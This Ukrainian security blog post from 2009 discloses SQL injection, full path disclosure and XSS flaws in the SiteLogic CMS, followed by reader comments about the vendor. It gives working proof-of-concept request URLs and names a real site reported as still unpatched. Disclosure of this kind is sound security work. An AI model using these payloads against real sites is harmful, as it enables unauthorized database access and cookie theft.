« XSS атаки через файли зображень
Добірка експлоітів »

Уразливості в CMS SiteLogic

23:55 27.06.2009

У березні, 03.03.2008, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості в CMS SiteLogic (це українська комерційна CMS). Уразливості виявив на сайті http://prp.org.ua. Про наявність уразливостей в їх CMS я неодноразово повідомляв розробникам CMS SiteLogic.

SQL Injection:

http://site/index.php?mid=-1%20union%20select%201,1,version(),1,1,1,1,1

Full path disclosure:

http://site/index.php?mid=’

http://site/includes/stat.php

XSS:

http://site/index.php?mid=10&action=news_full&search_item=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/index.php?mid=45&action=search_list&str=%3Cscript%3Ealert(document.cookie)%3C/script%3E


This entry was posted on 23:55 27.06.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

4 відповідей на “Уразливості в CMS SiteLogic”

  1. poma каже:
    Неділя, 23:04 28.06.2009

    (це українська комерційна CMS)
    sitelogic.ru =\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

  2. MustLive каже:
    Неділя, 23:26 28.06.2009

    poma

    Про конструктор сайтів Sitelogic (sitelogic.ru) мені відомо, але до даної новини він не має жодного відношення. Я описав уразливості в CMS SiteLogic - українській комерційній CMS (як я чітко написав в новині). Це різні веб системи.

    Я не став згадувати в новині назву розробника CMS SiteLogic, щоб не робити їм зайвий чорний PR :-) . Особливо враховуючи, що за 1,5 роки я їм неодноразово повідомляв про дірки в їх системи, але вони їх так і не виправили (як цього досі не зробили й власники prp.org.ua, яким я також неодноразово повідомляв).

    Якщо хочеш, то можеш спробувати знайти виробника CMS ;-) . Що легко зробити через вищезгаданий сайт prp.org.ua.

  3. poma каже:
    Понеділок, 11:25 29.06.2009

    “Сайт розроблено компанією P**e****” (:
    криві руки в розробників )

  4. MustLive каже:
    Понеділок, 18:55 29.06.2009

    Так, саме цією компанією розроблений сайт і CMS ;-) . Для того я і зіслався в тексті на сайт prp.org.ua, щоб всі бажаючі змогли самі вияснити, що ж це за такий веселий розробник.

    криві руки в розробників )

    Є таке :-) . До того ж ще й 1,5 роки наполегливо ігнорують мої попередження про дірки на їх сайті. І за рахунок дірявості своєї системи вони підставляють як себе (бо їх сайт також на цій CMS), так і всіх своїх клієнтів, що користуються даною CMS. Та й інших своїх клієнтів, що цією системою не користовуються (бо й сайти інших їхніх клієнтів також уразливі, як я перевірив).

    Інші веб девелопери як в Україні, так і в світі, також активно займаються створенням дірок :D . Тому власникам сайтів, що самі розробляють свої сайти, або замовляють їх розробку у веб дизайн студій (як в Україні, так і в світі), варто завжди проводити аудит безпеки своїх сайтів.

Leave a Reply

You must be logged in to post a comment.